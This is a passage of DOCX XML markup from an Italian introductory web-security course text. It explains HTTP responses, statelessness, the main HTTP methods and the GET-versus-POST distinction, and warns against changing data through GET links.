        <w:t xml:space="preserve">), una breve descrizione testuale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Intestazioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chiave-valore con informazioni sul contenuto della risposta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Riga vuota</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Corpo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il contenuto vero e proprio (HTML, JSON, immagine, file…)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: Mon, 20 Apr 2026 14:23:01 GMT</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Server: nginx/1.24.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: text/html; charset=utf-8</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Length: 1247</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie: session_id=z9y8x7w6; Path=/; HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;head&gt;&lt;title&gt;Esempio&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;body&gt;&lt;h1&gt;Benvenuto&lt;/h1&gt;...&lt;/body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando il browser riceve questa risposta, legge il codice (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ tutto bene), guarda il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">text/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ è una pagina HTML), e disegna la pagina.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="http-è-stateless"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una caratteristica fondamentale di HTTP — con conseguenze enormi sulla sicurezza — è che il protocollo è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">stateless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: senza stato. Significa che ogni richiesta è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">indipendente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da tutte le altre. Il server, di per sé, non ricorda chi sei tra una richiesta e la successiva. Se fai login alle 14:30 e clicchi su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il mio profilo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alle 14:31, il server non sa automaticamente che sei la stessa persona di un minuto fa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ovviare a questa amnesia esistono i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sessioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che vediamo nella </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Ma porta a casa già adesso questo concetto: il server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">deve essere convinto, a ogni singola richiesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che sei chi dici di essere e che hai i permessi per fare quello che chiedi. Questo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">convincimento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è esattamente il punto in cui si annidano molte delle vulnerabilità di sicurezza che vedremo (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> in particolare).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:id="113" w:name="i-metodi-http"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="sec_3_3"/>
      <w:r>
        <w:t xml:space="preserve">3.3 I metodi HTTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni richiesta HTTP ha un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">metodo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(chiamato anche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">verbo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) che indica l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">azione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che il client vuole compiere. I metodi più importanti sono cinque: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Metodo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Significato</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esempio d’uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Richiedi una risorsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Apertura di una pagina, scaricamento di un’immagine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Invia dati per creare qualcosa di nuovo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compilazione di un modulo di registrazione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sostituisci una risorsa esistente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aggiornamento del profilo utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modifica parzialmente una risorsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cambio della sola password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cancella una risorsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Eliminazione di un account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esistono anche altri metodi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HEAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CONNECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TRACE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) ma per i nostri scopi sono marginali.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="112" w:name="get-vs-post-la-distinzione-che-conta"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET vs POST: la distinzione che conta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per la maggior parte di questo corso, ti basterà capire bene la distinzione fra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si usa per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiedere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati al server. Caratteristiche:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I parametri viaggiano nella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cioè nell’indirizzo della pagina), nella forma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?nome=mario&amp;età=20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La richiesta non ha un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una GET è (in teoria)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">idempotente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ripeterla più volte produce lo stesso effetto. Aprire dieci volte una pagina di lettura non cambia nulla sul server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le URL con i parametri sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">registrate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella cronologia del browser, nei log del server, possono essere copiate e condivise.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mettere informazioni sensibili (password, dati personali, token segreti) nei parametri di una GET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si usa per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">inviare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati al server, spesso per creare o modificare qualcosa. Caratteristiche:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I parametri viaggiano nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">della richiesta, non nella URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non è idempotente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ripetere la stessa POST più volte produce di solito effetti diversi (creo dieci registrazioni invece di una)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il body</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">finisce nei log del server di default né nella cronologia del browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È il metodo da preferire per moduli di registrazione, login, pagamenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Idempotenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= una proprietà delle operazioni: un’operazione è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">idempotente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se ripeterla più volte produce lo stesso effetto di farla una volta sola. Premere il pulsante dell’ascensore è idempotente (chiamarlo due volte non lo fa arrivare due volte). Inviare un modulo di pagamento non lo è (premere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">paga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">due volte può addebitarti due volte). Per ragioni di sicurezza e di esperienza utente, le operazioni che modificano dati devono usare POST/PUT/DELETE — non GET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Errore comune da tenere a mente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alcuni sviluppatori, per pigrizia o per fraintendimento, fanno operazioni di modifica/cancellazione con GET (per esempio: un link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a href="/utente/elimina/42"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Questo è un disastro per più ragioni: i crawler dei motori di ricerca seguono i link e potrebbero cancellare dati; le pagine vengono ripetutamente caricate dalla cronologia del browser; espone all’attacco CSRF (che vedrai eventualmente al secondo anno).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Operazioni che modificano dati: sempre POST, PUT, PATCH o DELETE. Mai GET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
